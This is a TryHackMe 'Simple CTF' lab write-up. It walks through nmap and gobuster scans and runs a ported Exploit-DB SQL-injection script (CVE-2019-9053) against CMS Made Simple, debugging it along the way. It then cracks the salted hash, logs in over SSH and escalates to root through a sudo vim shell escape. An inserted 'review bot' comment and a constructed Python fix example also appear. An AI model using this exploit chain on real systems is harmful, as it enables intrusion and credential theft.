[TryHackMe] Simple CTF
How many services are running under port 1000?
What is running on the higher port?
We need to answer how many ports numbered 1000 or below are open, and which service is running on the port above 1000.
┌──(kali㉿kali)-[~]
└─$ nmap -sV -p 1000- --min-rate 5000 10.10.68.71
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-07 00:36 JST
Nmap scan report for 10.10.68.71
Host is up (0.27s latency).
Not shown: 64535 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 48.71 seconds
┌──(kali㉿kali)-[~]
└─$ nmap -sV -p -1000 --min-rate 5000 10.10.68.71
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-07 00:37 JST
Nmap scan report for 10.10.68.71
Host is up (0.26s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
Service Info: OS: Unix
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.93 seconds
What's the CVE you're using against the application?
To what kind of vulnerability is the application vulnerable?
Use gobuster to enumerate the resources hosted by Apache. It looks like the sample directory is accessible.
┌──(kali㉿kali)-[~]
└─$ gobuster dir -u 10.10.172.123 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.172.123
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/simple (Status: 301) [Size: 315] [--> http://10.10.172.123/simple/]
Progress: 87664 / 87665 (100.00%)
===============================================================
Finished
===============================================================
Access sample. The application appears to be built with CMS Made Simple version 2.2.8.
Searching NVD gave a number of hits. A related exploit was also found; there appears to be an SQL injection vulnerability. From this, the answer is CVE-2019-9053.
What's the password?
Try to crack the password using the code published on Exploit Database. The code was written for Python 2, so I converted it to Python 3 with 2to3.
┌──(kali㉿kali)-[~]
└─$ 2to3 -w Desktop/46635.py
/usr/bin/2to3:3: DeprecationWarning: lib2to3 package is deprecated and may not be able to parse Python 3.10+
from lib2to3.main import main
RefactoringTool: Skipping optional fixer: buffer
RefactoringTool: Skipping optional fixer: idioms
RefactoringTool: Skipping optional fixer: set_literal
RefactoringTool: Skipping optional fixer: ws_comma
RefactoringTool: Refactored Desktop/46635.py
--- Desktop/46635.py (original)
+++ Desktop/46635.py (refactored)
@@ -22,10 +22,10 @@
options, args = parser.parse_args()
if not options.url:
- print "[+] Specify an url target"
- print "[+] Example usage (no cracking password): exploit.py -u http://target-uri"
- print "[+] Example usage (with cracking password): exploit.py -u http://target-uri --crack -w /path-wordlist"
- print "[+] Setup the variable TIME with an appropriate time, because this sql injection is a time based."
+ print("[+] Specify an url target")
+ print("[+] Example usage (no cracking password): exploit.py -u http://target-uri")
+ print("[+] Example usage (with cracking password): exploit.py -u http://target-uri --crack -w /path-wordlist")
+ print("[+] Setup the variable TIME with an appropriate time, because this sql injection is a time based.")
exit()
url_vuln = options.url + '/moduleinterface.php?mact=News,m1_,default,0'
@@ -60,13 +60,13 @@
def beautify_print_try(value):
global output
- print "\033c"
+ print("\033c")
cprint(output,'green', attrs=['bold'])
cprint('[*] Try: ' + value, 'red', attrs=['bold'])
def beautify_print():
global output
- print "\033c"
+ print("\033c")
cprint(output,'green', attrs=['bold'])
def dump_salt():
@@ -180,7 +180,7 @@
dump_password()
if options.cracking:
- print colored("[*] Now try to crack password")
+ print(colored("[*] Now try to crack password"))
crack_password()
beautify_print()
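Review bot: these hunks only wrap print statements in parentheses; 2to3 does not change str/bytes semantics, so the `hashlib.md5(str(salt) + line)` call in crack_password (line 56 in the traceback further down) still passes a str, and the wordlist is still opened in text mode with the default UTF-8 codec. Both need a manual fix after conversion: `.encode('utf-8')` on the value being hashed, and an explicit encoding (or an errors handler) when opening the wordlist.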
RefactoringTool: Files that were modified:
RefactoringTool: Desktop/46635.py
┌──(kali㉿kali)-[~]
└─$ python Desktop/46635.py
[+] Specify an url target
[+] Example usage (no cracking password): exploit.py -u http://target-uri
[+] Example usage (with cracking password): exploit.py -u http://target-uri --crack -w /path-wordlist
[+] Setup the variable TIME with an appropriate time, because this sql injection is a time based.
I tried cracking as the usage text describes, but it ended with a runtime error.
┌──(kali㉿kali)-[~]
└─$ python Desktop/46635.py -u http://10.10.172.123/sample --crack -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Salt for password found:
[+] Username found:
[+] Email found:
[+] Password found:
[*] Try: # directory-list-2.3-small.txt
Traceback (most recent call last):
File "/home/kali/Desktop/46635.py", line 184, in <module>
crack_password()
File "/home/kali/Desktop/46635.py", line 56, in crack_password
if hashlib.md5(str(salt) + line).hexdigest() == password:
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
TypeError: Strings must be encoded before hashing
A string is being passed to hashlib.md5, but it apparently requires bytes. I changed the argument to be converted with encode('utf-8'). I also switched the wordlist to rockyou.txt.
When I ran it again, it failed with another error: rockyou.txt seems to contain non-UTF-8 characters that cannot be decoded.
[+] Salt for password found:
[+] Username found:
[+] Email found:
[*] Try: $
[*] Now try to crack password
Traceback (most recent call last):
File "/home/kali/Desktop/46635.py", line 184, in <module>
crack_password()
File "/home/kali/Desktop/46635.py", line 53, in crack_password
for line in dict.readlines():
^^^^^^^^^^^^^^^^
File "<frozen codecs>", line 322, in decode
UnicodeDecodeError: 'utf-8' codec can't decode byte 0xf1 in position 923: invalid continuation byte
┌──(kali㉿kali)-[~]
└─$ file rockyou.txt
rockyou.txt: Unicode text, UTF-8 text
I converted the rockyou.txt that ships with Kali to UTF-8 and used that instead.
iconv -f ISO-8859-1 -t UTF-8 /usr/share/wordlists/rockyou.txt > rockyou_utf8.txt
It cracked successfully.
[+] Salt for password found: 1dac0d92e9fa6bb2
[+] Username found: mitch
[+] Email found: admin@admin.com
[+] Password found: 0c01f4468bd75d7a84c7eb73846e8d96
[+] Password cracked: ■■■
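The two Python 3 errors above (TypeError from hashlib, UnicodeDecodeError from the wordlist) and their fixes, reproduced on constructed data as an added example; this is not the Exploit-DB script, and the salt, hash and wordlist bytes are made up for the demonstration.

```python
import hashlib
import io

# Constructed sample data for this example (not the values from the writeup).
SALT = "0123456789abcdef"
SECRET = "ma\u00f1ana"  # contains ñ: two bytes in UTF-8, the single byte 0xf1 in ISO-8859-1
STORED_HASH = hashlib.md5((SALT + SECRET).encode("utf-8")).hexdigest()

# Constructed wordlist: UTF-8 lines plus one ISO-8859-1 line, mimicking the
# mixed-encoding rockyou.txt that made readlines() raise UnicodeDecodeError.
WORDLIST_BYTES = b"password\n123456\nma\xf1ana\n" + "caf\u00e9\n".encode("utf-8")


def decodes_as_utf8(raw: bytes) -> bool:
    # Reproduces the second error: a single non-UTF-8 byte makes a strict
    # decode of the whole file fail.
    try:
        raw.decode("utf-8")
        return True
    except UnicodeDecodeError:
        return False


def salted_md5(salt: str, word: str) -> str:
    # Fix 1: hashlib only accepts bytes in Python 3, so encode the str first.
    # (In Python 2, str already was a byte string, which is why the original ran.)
    return hashlib.md5((salt + word).encode("utf-8")).hexdigest()


def iter_words(raw: bytes):
    # Fix 2: decode line by line, falling back to ISO-8859-1 for lines that are
    # not valid UTF-8. This does in-process what the iconv step did up front,
    # without letting one bad line abort the whole read.
    # Note that re-encoding a fallback line as UTF-8 changes the bytes that get
    # hashed, which matters when the stored hash was computed over raw bytes.
    for line in io.BytesIO(raw):
        try:
            yield line.decode("utf-8").rstrip("\r\n")
        except UnicodeDecodeError:
            yield line.decode("iso-8859-1").rstrip("\r\n")


def find_match(salt: str, stored_hash: str, raw_wordlist: bytes):
    # Compares each candidate's salted MD5 against the stored hash; None if no match.
    for word in iter_words(raw_wordlist):
        if salted_md5(salt, word) == stored_hash:
            return word
    return None
```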
Where can you login with the details obtained?
From the nmap results, the candidates are FTP or SSH. The SQLi also gave us the username, so I tried logging in over SSH, which succeeded.
┌──(kali㉿kali)-[~]
└─$ ssh mitch@10.10.11.241 -p 2222
The authenticity of host '[10.10.11.241]:2222 ([10.10.11.241]:2222)' can't be established.
ED25519 key fingerprint is SHA256:iq4f0XcnA5nnPNAufEqOpvTbO8dOJPcHGgmeABEdQ5g.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[10.10.11.241]:2222' (ED25519) to the list of known hosts.
mitch@10.10.11.241's password:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.15.0-58-generic i686)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
0 packages can be updated.
0 updates are security updates.
Last login: Mon Aug 19 18:13:41 2019 from 192.168.0.190
$ pwd
/home/mitch
What's the user flag?
After logging in, user.txt was in the home directory and contained the flag.
Last login: Mon Aug 19 18:13:41 2019 from 192.168.0.190
$ pwd
/home/mitch
$ ls
user.txt
$ cat user.txt
Is there any other user in the home directory? What's its name?
Checking the home directory showed another user, sunbath.
$ cd ..
$ ls
mitch sunbath
What can you leverage to spawn a privileged shell?
Check which commands mitch is allowed to run with sudo using sudo -l.
$ sudo -l
User mitch may run the following commands on Machine:
(root) NOPASSWD: /usr/bin/vim
What's the root flag?
Googling for "vim spawn a privileged" and similar turned up the following page. Opening vim with sudo vim and typing :!sh gives a shell running as root. I did this and retrieved the flag from the text file in the root directory.
$ sudo vim
# whoami
root
# ls
mitch sunbath
# cd /root
# ls
root.txt
# cat root.txt